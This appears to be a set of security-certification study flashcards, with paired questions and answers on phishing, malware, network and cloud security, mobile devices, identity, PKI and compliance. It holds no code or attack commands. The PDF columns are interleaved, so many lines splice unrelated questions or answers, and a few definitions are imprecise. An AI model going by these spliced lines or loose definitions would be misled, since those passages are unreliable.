Describe phishing. Define pharming.

How can you protect against impersonation Do you know what dumpster diving is in the
attacks? context of cybersecurity?

What is ransomware and how can you protect

Describe shoulder surfing.
against it?

How can you mitigate privilege escalation

Define Trojan horse.
attacks?

Describe a replay attack. What is a cross-site scripting (XSS) attack?

 Phishing is a form of social engineering often
Pharming is a cyber attack where legitimate
delivered through email or text, aiming to
websites are redirected to bogus sites, often
deceive individuals into providing sensitive
achieved through poisoned DNS servers or client
information by impersonating a trustworthy
vulnerabilities.
entity.

Dumpster diving involves searching through To protect against impersonation attacks, never
discarded materials like trash or recycling to volunteer personal information, avoid disclosing
gather information that can be used for cyber personal details, always verify before revealing
attacks, such as impersonating individuals or info, and encourage verification, especially in
obtaining sensitive data. organizations with valuable information.

Ransomware is a type of malware that encrypts

data and demands payment for decryption. To Shoulder surfing is the act of obtaining important
protect against ransomware, always maintain information by visually spying on someone, often
offline backups, keep operating systems and in public places like airports, coffee shops, or
applications updated, and ensure anti-virus/anti- using binoculars or telescopes from a distance.
malware signatures are up to date.

To mitigate privilege escalation, patch

A Trojan horse is malicious software that
vulnerabilities quickly, keep anti-virus/anti-
pretends to be legitimate to deceive users into
malware software updated, use Data Execution
executing it, allowing attackers to gain
Prevention, and implement Address Space
unauthorized access to a system.
Layout Randomization.

Cross-site scripting (XSS) is a web application

A replay attack involves maliciously
vulnerability where attackers inject malicious
retransmitting data that was previously
scripts into web pages viewed by other users,
recorded, aiming to impersonate a legitimate
potentially leading to data theft or unauthorized
user or gain unauthorized access to systems.
actions.
Explain the concept of cross-site request forgery Describe the Capital One SSRF breach in March
(CSRF). 2019.

How can driver manipulation be achieved

Define malware hide-and-go-seek.
through shimming?

Do SSL stripping and HTTP downgrade combine Describe the concept of refactoring in the
for an attack? context of metamorphic malware.

How do race conditions lead to problems like the

Define memory vulnerabilities and their impact.
Mars rover reboot loop?

Do directory traversal attacks exploit Describe the risks associated with improper error
vulnerabilities in web servers? handling in applications.
 Cross-site request forgery (CSRF) is an attack
Attacker executed commands on Capital One
where a user is tricked into executing unwanted
website due to misconfigured WAF, obtained
actions on a web application in which they are
WAF role credentials, accessed Amazon S3
authenticated, exploiting the trust between the
buckets, and retrieved sensitive data.
user's browser and the application.

By acting as a middleman, shimming fills the gap

Method where traditional anti-virus may miss
between two objects, allowing malware authors
new attack types, allowing malware to infect and
to create their own shims to bypass security
hide, posing a constant security challenge.
measures.

Refactoring involves metamorphic malware Yes, SSL stripping and HTTP downgrade merge to
redesigning itself intelligently by changing strip encryption from HTTPS, requiring the
functions, application flow, and code structure to attacker to sit between the victim and web
evade signature-based detection. server to modify data.

Memory vulnerabilities involve manipulating Race conditions can cause issues like the Mars
memory to exploit issues like memory leaks, rover reboot loop when a problem triggers a
NULL pointer dereference, and integer overflow, reboot due to a file system issue, creating a loop
leading to system crashes or application issues. due to a race condition.

Improper error handling can expose sensitive Yes, directory traversal attacks read files outside
information, leading to security breaches, as a website's directory, exploiting vulnerabilities in
detailed error messages may reveal network web server software or poorly written code to
data, memory dumps, or database information. access restricted files.
 How can API attacks impact communication Define resource exhaustion attacks like ZIP
paths? bombs.

How do Bluejacking and Bluesnarfing differ in

Describe the concept of wireless evil twins.
Bluetooth attacks?

Do wireless disassociation attacks lead to Define the term threat actors and their
significant network disruptions? attributes.

Describe the attack vectors used by threat How does threat intelligence aid in cybersecurity
actors. defense?

Define indicators of compromise (IOC) and their Describe the concept of predictive analysis in
significance. cybersecurity.
Resource exhaustion attacks, such as ZIP bombs, API attacks target vulnerabilities in
are specialized DoS attacks that may use communication paths, potentially exposing
minimal resources to overload systems, like a sensitive data, causing DoS, intercepted
42KB file expanding to 4.5 petabytes. communication, or privileged access breaches.

Bluejacking involves sending unsolicited

Wireless evil twins mimic legitimate networks to
messages, while Bluesnarfing accesses and
deceive users, often used for phishing or
transfers data from Bluetooth-enabled devices
malware distribution by configuring an access
without authentication, posing a serious security
point to appear as an existing network.
threat.

Threat actors are entities responsible for

Yes, wireless disassociation attacks disrupt
impacting the safety of others, including APTs,
wireless networks, causing significant denial of
insiders, nation states, hacktivists, script kiddies,
service by repeatedly disconnecting users from
organized crime, and hackers, each with varying
the network.
motivations and sophistication levels.

Threat intelligence involves researching threats

Attack vectors are methods used by threat
and threat actors to make informed decisions,
actors to gain access or infect targets, including
utilizing open-source intelligence,
direct access, wireless, email, supply chain,
closed/proprietary intelligence, vulnerability
social media, removable media, cloud, and DNS
databases, and public/private information-
attacks, among others.
sharing centers to enhance security measures.

Predictive analysis involves analyzing large

datasets to identify suspicious patterns, Indicators of compromise are events indicating a
behaviors, and potential attacks, creating security breach, such as unusual network activity
forecasts for preemptive security measures, or file changes, providing high-confidence
often utilizing machine learning for early threat intrusion alerts for immediate response.
detection.
 Describe how to access the code base for
How do third-party risks impact cybersecurity?
outsourced code development.

Define vulnerability impacts based on the How can data loss occur due to unsecured
content. databases?

Explain the concept of identity theft based on Describe the financial loss experienced by the
Equifax's data breach. Bank of Bangladesh in March 2016.

What are the impacts of getting hacked on an How does ransomware impact availability loss in
organization's reputation? the context of BancoEstado's attack?

Define the concept of threat hunting in How does intelligence fusion contribute to
cybersecurity. cybersecurity efforts?
 Third-party risks pose security challenges due to
Accessing the code base for outsourced code system integration risks, lack of vendor support,
development can be done internally over a VPN supply chain vulnerabilities, and potential legacy
or through cloud-based access. platform issues, requiring diligence and local
security controls to mitigate threats.

Data loss can occur due to unsecured databases Vulnerability impacts can result in significant
with no password or default password, leading to economic losses, as seen in the malicious cyber
instances like Internet-facing databases being activity that cost the U.S. economy billions in
deleted. 2016.

The Bank of Bangladesh faced a financial loss Identity theft, exemplified by the Equifax breach,
when attackers sent secure messages to transfer involves unauthorized access to personal
nearly one billion dollars, resulting in significant information like names, SSNs, and addresses,
monetary losses and laundering through the leading to financial and personal risks for
Filipino casino industry. individuals.

Ransomware attacks, like the one on

Getting hacked can lead to organizations being
BancoEstado, can lead to extended bank
required to disclose breaches, stock prices
closures, segmented network impacts, and the
dropping, and facing public scrutiny, as seen in
need to wipe and restore systems to ensure
the Uber breach.
security.

Intelligence fusion involves combining diverse

Threat hunting involves proactively searching for
security data types using big data analytics to
potential attackers before they can breach a
identify patterns, correlations, and interesting
system, with strategies constantly evolving to
data points for enhanced threat detection and
combat cyber threats.
response.
 Explain the importance of configuration review in
Describe the process of vulnerability scanning.
cybersecurity.

Describe the process of provisioning an Define scalability and elasticity in the context of
application. handling application workload.

How does orchestration play a key role in cloud Do you need to describe the deprovisioning
computing? process of an application instance?

Explain the concept of obfuscation in secure How can code reuse lead to security
coding techniques. vulnerabilities?

Define input validation and its importance in Describe the purpose of memory management in
secure coding. secure coding.
Configuration review is crucial for validating the
Vulnerability scanning involves using powerful
security of device configurations, ensuring
tools to identify vulnerabilities through non-
proper settings to mitigate risks and
intrusive or intrusive scans, aiming to gather
vulnerabilities in workstations, servers, and
information without exploiting vulnerabilities.
security devices.

Provisioning an application involves deploying

Scalability refers to the ability to increase various components such as web servers,
workload within a given infrastructure, while database servers, middleware servers, and
elasticity involves adjusting available resources configuring user workstations. It also includes
based on workload changes. updating certificates and ensuring network
security.

Orchestration in cloud computing automates

Deprovisioning involves dismantling and
services, allowing them to appear and disappear
removing an application instance, ensuring
automatically or at the push of a button. It
security deprovisioning, reverting firewall
enables instant provisioning of entire application
policies, and addressing data handling to
instances, including servers, networks, switches,
prevent leaving sensitive information exposed.
and firewalls.

Code reuse involves using old code to build new Obfuscation involves making code difficult to
applications, which can spread security understand by turning readable code into
vulnerabilities if the old code contains flaws. nonsense while maintaining the same
Reusing vulnerable code increases the risk for all functionality. It helps prevent the discovery of
applications using it. security vulnerabilities.

Memory management in secure coding involves Input validation ensures that expected input
being mindful of how memory is used to prevent matches actual input, documenting all input
vulnerabilities like buffer overflows. Developers methods, and correcting any improper input. It
should not trust data input and follow best helps prevent security issues by verifying and
practices to design secure code. sanitizing user input.
 How do third-party libraries and SDKs pose Explain the importance of version control in
security risks in software development? software development.

Describe Non-repudiation in cryptography. Define Integrity in cryptography.

Do weak keys require additional processes to

How does symmetric encryption work?
strengthen them?

Describe the purpose of homomorphic

What is the purpose of hashing in cryptography?
encryption.

Do load balancers help distribute network traffic

Define network segmentation.
evenly?
 Version control allows tracking changes, Third-party libraries and SDKs extend
reverting to previous versions, and comparing programming language functionality but may
versions over time. It helps identify modifications contain insecure code. Extensive testing is
to important files and poses a security challenge required to ensure the security of applications
by potentially exposing historical information. using third-party components.

Non-repudiation ensures that a party cannot

Integrity ensures that data remains unchanged
deny the authenticity of their communication or
and unaltered during transmission or storage.
actions.

Yes, weak keys can be made stronger by

Symmetric encryption uses a single shared key
performing multiple processes like key stretching
to both encrypt and decrypt data.
or key strengthening.

Hashing represents data as a short string of text, Homomorphic encryption allows for performing
ensuring integrity and providing a unique calculations on encrypted data without
identifier for data. decrypting it.

Network segmentation involves dividing a Yes, load balancers distribute network traffic
network into smaller segments to improve across multiple servers to ensure even load
performance, security, and compliance. distribution.
How do VPNs ensure secure data transmission Describe the purpose of AH (Authentication
over public networks? Header) in VPNs.

Define ESP (Encapsulating Security Payload) in How does L2TP (Layer 2 Tunneling Protocol) work
VPNs. in VPNs?

Do HTML5 VPNs require a separate VPN Describe the purpose of Port Security in
application to create a VPN tunnel? networking.

How does Loop Protection prevent network

Define Broadcast Storm Control in networking.
issues in switched networks?

Describe the function of BPDU Guard in network What is the purpose of DHCP Snooping in
security. network security?
AH provides data integrity, origin authentication,
VPNs use encryption to create a private and
and protection against replay attacks using a
secure connection over a public network,
keyed-hash mechanism, but it does not provide
ensuring data confidentiality and integrity.
confidentiality/encryption.

L2TP connects sites over a layer 3 network as if ESP provides data confidentiality (encryption),
they were connected at layer 2, commonly limited traffic flow confidentiality, data integrity,
implemented with IPsec for encryption. and anti-replay protection.

Port Security involves controlling and protecting No, HTML5 VPNs create a VPN tunnel without a
the physical switch interface to limit overall separate VPN application, allowing direct
traffic, control specific traffic types, and watch communication to the VPN concentrator using an
for unusual or unwanted traffic. HTML5 compliant browser.

Loop Protection prevents switches from Broadcast Storm Control limits the number of
endlessly sending traffic back and forth by broadcasts per second to manage multicast and
implementing IEEE standard 802.1D to prevent unknown unicast traffic, maintaining a tight
loops in bridged networks. security posture.

BPDU Guard bypasses listening and learning

DHCP Snooping on layer 2 devices acts as a
states in spanning tree protocols to prevent a
DHCP firewall by filtering invalid IP and DHCP
switch port configured with PortFast from
information, adding untrusted devices to a table,
receiving BPDU frames, shutting down the
and preventing unauthorized DHCP servers.
interface if a BPDU frame is detected.
 How does DNSSEC enhance security in Domain
Define MAC Filtering in network security.
Name Resolution?

Describe the purpose of using a Jump Server in Do Hardware Security Modules (HSMs) provide
network security. cryptographic hardware security?

Define Unified Threat Management (UTM) in How do Next-Generation Firewalls (NGFWs) differ
network security. from traditional firewalls?

Describe the function of Intrusion Detection How does Mobile Device Management (MDM)
Systems (IDS) in network security. help in managing mobile devices?

Define Mobile Application Management (MAM) in Describe the purpose of SEAndroid in Android OS
mobile device security. security.
 DNSSEC (Domain Name System Security MAC Filtering limits access through the physical
Extensions) validates DNS responses, providing hardware address (MAC address) to enhance
origin authentication, data integrity, and public security by keeping unauthorized devices out
key cryptography by signing DNS records with and requiring additional administration for
trusted third parties. visitors.

Yes, HSMs offer high-end cryptographic hardware

A Jump Server provides access to secure network
security, including key backup, cryptographic
zones through a highly-secured device, allowing
accelerators, and secure storage, commonly
connections via SSH, tunneling, or VPN to
used in large environments for encryption and
manage multiple devices securely.
key management.

NGFWs analyze all data in every packet at the UTM combines various security features like web
OSI Application Layer, applying advanced security, URL filtering, malware inspection,
decodes and deep packet inspection to control firewall, IDS/IPS, and VPN endpoint into a single
traffic flows based on applications and apply appliance for comprehensive threat
application-specific vulnerability signatures. management.

MDM allows centralized management of

IDS watch network traffic for intrusions like
company-owned and user-owned mobile devices,
exploits, buffer overflows, and vulnerabilities,
setting policies on apps, data, camera use, and
providing detection through alarms or alerts to
controlling access to ensure security and
identify potential security threats.
compliance.

SEAndroid (Security Enhancements for Android) MAM involves provisioning, updating, and
integrates SELinux to provide access control removing mobile apps, creating an enterprise
security policies, isolates and sandboxes apps, app catalog, monitoring app use, and remotely
and protects privileged system daemons in wiping application data to securely manage
Android devices. mobile applications.
 How does Geofencing enhance mobile device Do Third-Party App Stores pose security risks for
security? mobile devices?

Define Rooting/Jailbreaking in the context of Describe the function of Remote Wipe in mobile
mobile device security. device security.

How does Full Device Encryption enhance mobile Define Unified Endpoint Management (UEM) and
device security? its role in mobile device security.

Describe the purpose of Context-Aware How does Containerization help in managing

Authentication in mobile device security. mobile device security?

Do External Media pose security risks for mobile Define USB On-The-Go (USB OTG) and its role in
devices? mobile device security.
Yes, Third-Party App Stores may contain insecure
Geofencing restricts or allows features based on
or malicious applications, leading to
the device's location, enabling control over
vulnerabilities, data leaks, and unauthorized
camera use, authentication, and app access
access, making them a potential security
depending on the geographical area.
concern for mobile devices.

Rooting (Android) or Jailbreaking (iOS) refers to

Remote Wipe allows the complete removal of
gaining unauthorized access to the operating
data from a mobile device, even if lost or stolen,
system of a mobile device, allowing users to
ensuring data security by remotely erasing all
install custom firmware and bypass security
information from the device.
features, posing a security risk.

Full Device Encryption scrambles all data on a

UEM manages both mobile and non-mobile
mobile device, ensuring data security even if the
devices, providing centralized management,
device is lost or stolen, but requiring users to
setting policies, and ensuring security across
remember their password as there is no recovery
different types of devices used by end-users.
option.

Context-Aware Authentication combines multiple

Containerization separates enterprise mobile
contextual factors like location, device pairing,
apps and data from personal data on a device,
and user behavior to enhance security by
creating a secure virtual container to limit data
allowing or denying access based on various
sharing and simplify offboarding processes.
parameters.

USB OTG allows direct connection of devices

Yes, External Media like SD flash memory or USB
without a computer, enabling mobile devices to
drives can store data and transfer information,
read from external drives and act as storage
potentially leading to data leaks or unauthorized
devices, posing a security risk due to easy data
access if not managed securely.
transfer.
Describe the function of Geotagging/GPS Tagging How does Geolocation enhance mobile device
in mobile device security. security?

Define SMS/MMS and its security implications in Describe the purpose of Recording Microphone in
mobile devices. mobile device security.

How does Camera Use pose security risks in Do Push Notification Services enhance mobile
mobile devices? device security?

Define Passwords and PINs in mobile device Describe the function of Biometrics in mobile
security. device security.

How does Mobile Packet Analysis help in network Define Channel Selection and Overlaps in
security? network security.
 Geolocation provides precise tracking details to Geotagging adds location metadata to
locate devices within feet, aiding in device documents using GPS coordinates, which can be
recovery and security measures, but also raising a security concern due to potential privacy
privacy concerns and potential misuse. issues and location tracking.

SMS (Short Message Service) and MMS

Recording Microphone allows audio recordings (Multimedia Messaging Service) allow text,
on mobile devices, which can be useful but also video, and audio communication, posing security
a legal liability, leading to privacy concerns and risks like data leaks, phishing attempts, and
potential misuse, managed by MDM. inbound notifications that can be controlled by
MDM.

Yes, Push Notification Services deliver Camera Use on mobile devices can lead to
information to mobile devices without user privacy breaches, corporate espionage, and
intervention, aiding in timely alerts and inappropriate use, making it a security concern
notifications, which can be managed by MDM to that can be controlled by MDM through disabling
control displayed notifications. or geo-fencing.

Biometrics use unique physical characteristics Passwords and PINs are common authentication
like fingerprints or facial recognition for methods used in mobile devices to secure
authentication, providing secure access to access, with recovery processes initiated through
devices, managed by MDM to control biometric MDM and options for strong passcodes or
authentication per app. alphanumeric passwords.

Channel Selection and Overlaps involve Mobile Packet Analysis allows monitoring of
configuring wireless access points to avoid wireless networks by capturing and analyzing
frequency conflicts and overlapping channels, data packets, providing insights into signal
ensuring efficient network performance and strengths, potential interference, and network
minimizing interference. performance.
Describe the purpose of Access Point Placement Define Wireless Infrastructure Security and its
in network security. importance.

How do Mobile Networks like Wi-Fi and Cellular Describe the function of Bluetooth in mobile
Networks operate in communication? communication.

Define RFID (Radio-frequency identification) and How does Near Field Communication (NFC)
its applications. enhance wireless communication?

Describe the purpose of Infrared (IR) in mobile Define USB (Universal Serial Bus) and its role in
devices. mobile device connectivity.

How does Global Positioning System (GPS) Describe the function of Mobile Device
enhance mobile device functionality? Enforcement in ensuring security.
 Wireless Infrastructure Security involves
Access Point Placement aims to minimize
securing wireless controllers and access points
overlap, avoid interference, and control signal
by controlling access to management consoles,
strength by strategically placing access points
using strong encryption, and updating firmware
where users are located and ensuring coverage
to protect against unauthorized access and
without excessive distance.
ensure network security.

Bluetooth facilitates high-speed communication Mobile Networks enable communication between

over short distances in Personal Area Networks, devices, with Wi-Fi providing local network
connecting mobile devices like smartphones, access and cellular networks connecting mobile
headsets, and smartwatches, but also posing devices globally, raising security concerns like
security risks like unauthorized access. traffic monitoring and location tracking.

NFC enables two-way wireless communication by RFID uses radio energy to transmit and receive
building on RFID technology, supporting data for various applications like access badges,
contactless payments, Bluetooth pairing, and inventory tracking, and pet identification,
access tokens, with security features like providing bidirectional communication and
encryption support. active/passive tag formats.

USB provides physical connectivity to mobile Infrared technology on mobile devices allows for
devices for data transfer and charging, allowing remote control of entertainment systems, file
connections to computers or external devices, transfers, and other applications, providing a
posing security risks if not managed securely. wireless communication method using IR signals.

Mobile Device Enforcement involves

implementing security measures like third-party GPS provides precise navigation and location-
app store control, preventing based services on mobile devices by determining
rooting/jailbreaking, and managing firmware longitude, latitude, and altitude, enabling
updates to enhance security and compliance on features like maps, directions, and geotracking.
mobile devices.
 Describe how geotagged information in Do WiFi Direct and ad hoc networks require
documents can be a security concern. access points?

Define BYOD and explain its security challenges. How does COPE differ from BYOD?

Describe VDI/VMI and its benefits. Define HA across zones in cloud computing.

How do resource policies contribute to cloud Explain the concept of secrets management in
security? cloud computing.

Describe the purpose of integration and auditing Define the term 'Cloud storage' and explain its
in cloud security. importance.
 No, WiFi Direct and ad hoc networks allow Geotagged information in documents can allow
wireless devices to connect directly without the easy tracking of users, potentially leading to
need for access points. security risks.

COPE (Corporate Owned, Personally Enabled) BYOD stands for Bring Your Own
involves the company buying the device, Device/Technology, where employees use their
maintaining full control, and allowing both personal devices for work, posing security
corporate and personal use, unlike BYOD where challenges due to the mix of personal and work
the employee owns the device. data.

HA (High Availability) across zones involves VDI/VMI separates apps and data from mobile
isolating locations within a cloud region, running devices, stores data securely, minimizes risk of
applications in active/standby or active/active physical device loss, centralizes app
modes, and using load balancers for seamless development, and manages applications
availability. centrally.

Secrets management involves authorizing

Resource policies in cloud computing manage
access to sensitive data like API keys, passwords,
identity and access, map job functions to roles,
and certificates, limiting access to necessary
provide granular access policies, and centralize
users, and providing an audit trail for monitoring
user accounts for synchronized access.
access.

Integration and auditing in cloud security aim to

Cloud storage involves storing data on a public
integrate security measures across platforms,
cloud, ensuring limited and protected access,
consolidate log storage and reporting using
requiring backups, and maintaining availability
SIEM, and validate security controls through
as the cloud environment evolves.
auditing.
 How do permissions impact cloud storage Explain the concept of encryption in cloud
security? computing.

Describe the purpose of replication in cloud Define cloud networks and their role in cloud
computing. computing.

Explain the concept of virtual networks in cloud Describe the importance of segmentation in
computing. cloud computing.

Define API inspection and integration in cloud Explain the role of compute cloud instances in
security. cloud computing.

Describe the function of security groups in cloud Define dynamic resource allocation in cloud
computing. computing.
 Encryption in cloud computing ensures data Permissions in cloud storage are crucial as one
security by encrypting data at rest (server-side permission mistake can lead to a data breach,
encryption) and in transit (client-side emphasizing the need to avoid public access by
encryption), with critical emphasis on key default and utilize options like IAM, bucket
management. policies, and globally blocking public access.

Cloud networks connect cloud components Replication involves copying data to multiple
internally and externally, allowing user locations for real-time duplication, ensuring
communication from the public Internet or over a disaster recovery, maintaining high availability,
VPN tunnel, and facilitating communication enabling data analysis, and constant data
between cloud devices. backups.

Segmentation in cloud computing involves Virtual networks in cloud computing consist of

separating VPCs, containers, and microservices virtual devices like servers and routers, built
to enhance application security, ensure data and from the cloud console with configurations
application separation, and add virtualized similar to physical devices, offering on-demand
security technologies like WAF and NGFW. changes and rapid elasticity.

Compute cloud instances in cloud computing, API inspection and integration focus on
part of the IaaS component, manage computing monitoring microservice architecture for security
resources by launching VMs or containers, risks, identifying and monitoring API calls for
allocating resources based on demand, and unauthorized access attempts, and integrating
enabling disabling/removing instances. security measures across different platforms.

Dynamic resource allocation in cloud computing

Security groups in cloud computing act as
provisions resources automatically based on
firewalls for compute instances, controlling
demand, scales resources up and down as
inbound and outbound traffic flows based on
needed, and monitors CPU utilization to
layer 4 port numbers and layer 3 addresses.
provision new application instances.
 Explain the concept of instance awareness in Describe the purpose of virtual private cloud
cloud security. endpoints in cloud computing.

Explain the security concerns related to Define the role of Cloud Access Security Brokers
container security in cloud computing. (CASB) in cloud security.

Describe the purpose of Next-Gen Secure Web Explain the function of firewalls in the cloud and
Gateways (SWG) in cloud security. their benefits.

Define the concept of security controls in cloud Describe the role of Identity Providers (IdP) in
computing. authentication.

Explain the concept of attributes in identity Define certificates and their role in digital
management. security.
 Virtual private cloud endpoints in cloud Instance awareness in cloud security involves
computing serve as VPC gateway endpoints, identifying and managing specific data flows for
allowing private cloud subnets to communicate each instance, defining and setting policies for
with other cloud services securely without data access, and implementing granular security
requiring internet connectivity. controls.

CASBs help secure cloud environments by Container security in cloud computing involves
integrating security policies, providing visibility addressing bugs, insufficient security controls,
into app usage, ensuring compliance with and misconfigurations by using container-specific
regulations, preventing threats, and securing operating systems, grouping containers based on
data transfers. sensitivity, and limiting intrusion scope.

Firewalls in the cloud control traffic flows inside Next-Gen SWGs protect users and devices by
and outside the cloud, offer cost-effective examining application APIs, allowing or
security measures, enable segmentation disallowing specific activities, providing instance-
between microservices, VMs, or VPCs, and aware security, and differentiating between
operate at OSI layers 4 and 7. development and production instances.

Security controls in cloud computing include

Identity Providers vouch for users' identities,
cloud-native controls integrated and supported
manage a list of entities like users and devices,
by the cloud provider, as well as third-party
and are commonly used in Single Sign-On
solutions that extend policies and reporting
applications or authentication processes.
capabilities across multiple cloud providers.

Certificates bind public keys with digital Attributes are identifiers or properties of an
signatures, providing trust and security in digital entity used for identification, including personal
communications, with digital certificates being attributes like name and email address, and
used for encryption, digital signatures, and other attributes like department name or job
secure data exchange. title.
 Describe the purpose of tokens and cards in Explain the concept of SSH keys and their role in
authentication. secure communication.

Define Password Authentication Protocol (PAP) Describe the Challenge-Handshake

and its security implications. Authentication Protocol (CHAP) and its benefits.

Explain the concept of Remote Authentication

Define Kerberos and its role in network
Dial-in User Service (RADIUS) and its
authentication.
applications.

Describe the purpose of IEEE 802.1X in network Explain the concept of federation in identity
access control. management.

Define Security Assertion Markup Language Describe the purpose of OAuth in authorization
(SAML) and its role in authentication. and access control.
 SSH keys are used in Secure Shell Tokens and cards are used as authentication
communication as an alternative to username factors, with smart cards integrating with
and password, providing secure authentication devices and USB tokens storing certificates for
through public/private key pairs. secure authentication.

CHAP is an encrypted authentication protocol PAP is a basic authentication method used in

using a challenge-response mechanism to verify legacy systems, transmitting passwords in clear
passwords, providing secure authentication text, making it a weak authentication scheme
without transmitting passwords in clear text. with non-encrypted password exchange.

Kerberos is a network authentication protocol RADIUS is a common AAA protocol used to

enabling mutual authentication between clients centralize authentication for various devices like
and servers, protecting against on-path or replay routers, switches, firewalls, and remote VPN
attacks, and providing a trusted authentication access, supporting a wide range of platforms and
mechanism. devices.

Federation allows network access for partners,

IEEE 802.1X is a port-based Network Access
suppliers, and customers, providing Single Sign-
Control protocol that restricts network access
On and trust relationships between
until authentication succeeds, often used in
organizations, requiring a trust relationship to
conjunction with EAP for secure network access.
establish secure access.

OAuth is an authorization framework used to

SAML is an open standard for authentication and
determine user access to resources, providing
authorization, enabling users to authenticate
industry support for secure authorization
through a third-party for access, commonly used
between applications without handling
for secure authentication in various applications.
authentication.
 Explain the concept of access control and its Define Mandatory Access Control (MAC) and its
importance in security. security implications.

Describe the benefits of Role-based Access Explain the concept of Attribute-based Access
Control (RBAC) in security. Control (ABAC) and its advantages.

Define Rule-based Access Control and its Describe the role of File System Security in
application in security. managing access to files.

Explain the concept of Conditional Access and its Define Privileged Access Management (PAM) and
importance in modern workplaces. its benefits.

Describe the purpose of Public Key Infrastructure Explain the concept of Certificate Chaining and
(PKI) in digital security. its significance in digital security.
 Access control involves enforcing policies to
MAC limits operations on objects based on
ensure only authorized rights are exercised,
security clearance levels, assigning labels to
determining user permissions, and defining
objects for access control, and ensuring users
policies based on access control models and
cannot change security settings.
business requirements.

ABAC considers multiple parameters for access

RBAC assigns access based on user roles,
control, allowing access based on various criteria
providing implicit rights based on roles, and
like resource information, IP address, time of
using groups to manage access, enhancing
day, and desired actions, providing context-
security by controlling user permissions.
aware authorization.

File System Security involves controlling access Rule-based Access Control enforces access rules
to files through access control lists, user/group based on system-enforced conditions,
permissions, and centralized administration, determining access based on predefined rules
ensuring secure encryption and decryption of associated with objects, and ensuring secure
files. access control.

PAM manages superuser access by storing Conditional Access applies access rules based on
privileged accounts in a digital vault, enabling conditions like employee status, location,
centralized password management, automation, application type, and device, providing granular
access control, and extensive tracking and access control and enhancing security in
auditing of privileged accounts. dynamic work environments.

Certificate Chaining establishes a chain of trust PKI involves policies, procedures, and
between the server and the root CA, listing all technologies for managing digital certificates,
certificates between the SSL certificate and the ensuring secure creation, distribution, and
root certificate, ensuring secure validation of management of certificates, and establishing
certificates in digital communications. trust in digital communications.
Define the role of OCSP stapling in certificate Describe the concept of Key Escrow and its
validation. implications in security.

Explain the concept of Pinning and its role in Define the concept of Certificate Revocation List
ensuring secure connections. (CRL) and its importance in digital security.

Describe how traceroute works. Do nslookup and dig serve the same purpose?

Define Nmap. How does ping work as a troubleshooting tool?

Describe the three categories of security

What is the purpose of theHarvester tool?
controls.
 Key Escrow involves a third-party holding OCSP stapling provides scalability for OCSP
decryption keys for legitimate purposes, checks by stapling the OCSP status into the
enabling access to encrypted data under SSL/TLS handshake, allowing the certificate
controlled conditions, and ensuring secure key holder to verify their own status and ensuring
management and access control. secure certificate validation.

CRL is a list of revoked certificates maintained Pinning involves associating expected

by the CA, containing certificates that are no certificates or public keys with an application to
longer trusted, ensuring secure certificate verify server legitimacy, enabling secure
management and preventing the use of connections by detecting unauthorized
compromised certificates. certificates or public keys.

Both nslookup and dig are used to lookup

Traceroute is a tool used to determine the route
information from DNS servers, such as canonical
a packet takes to reach a destination by mapping
names, IP addresses, and cache timers, but dig
the entire path, taking advantage of ICMP Time
is considered more advanced and preferred over
to Live Exceeded error messages.
nslookup.

Nmap is a network mapping tool used to find and

Ping is used to test reachability by determining
learn more about network devices, perform port
round-trip time using ICMP, making it one of the
scans to identify open ports, discover the
primary troubleshooting tools to check if a host
operating system without logging in, and identify
is reachable.
available services on a device.

theHarvester is used to gather OSINT (Open-

Source Intelligence) by scraping information from
Managerial controls, Operational controls, search engines like Google or Bing to find
Technical controls associated IP addresses, people from LinkedIn,
PGP keys by email domain, and perform DNS
brute force searches.
Define preventive security controls and provide How does a detective security control differ from
examples. a preventive control?

What is the purpose of corrective security Define deterrent security controls and give
controls? examples.

Describe compensating security controls and What is the purpose of physical security
provide examples. controls?

How does GDPR give individuals control over

Define compliance in the context of security.
their personal data?

What is the purpose of the Payment Card

Industry Data Security Standard (PCI DSS)?
Detective controls identify and record intrusion
Controls that physically control access to prevent
attempts but may not prevent access, while
security incidents, e.g., door locks, security
preventive controls physically control access to
guards, firewalls
prevent incidents.

Deterrent controls discourage intrusion attempts Corrective controls are designed to mitigate
without directly preventing access, e.g., warning damage after a security incident, such as
signs, login banners. blocking an attacker or restoring from backups.

Compensating controls do not prevent attacks

Physical controls like fences, locks, and
but restore systems using other means, e.g., re-
mantraps provide real-world security for assets.
imaging, hot sites.

GDPR allows individuals to decide where their

Compliance refers to meeting the standards of
personal data goes and provides the right to be
laws, policies, and regulations related to security.
forgotten.

PCI DSS is a standard for protecting credit card

data, with objectives like maintaining a secure
network and monitoring networks regularly.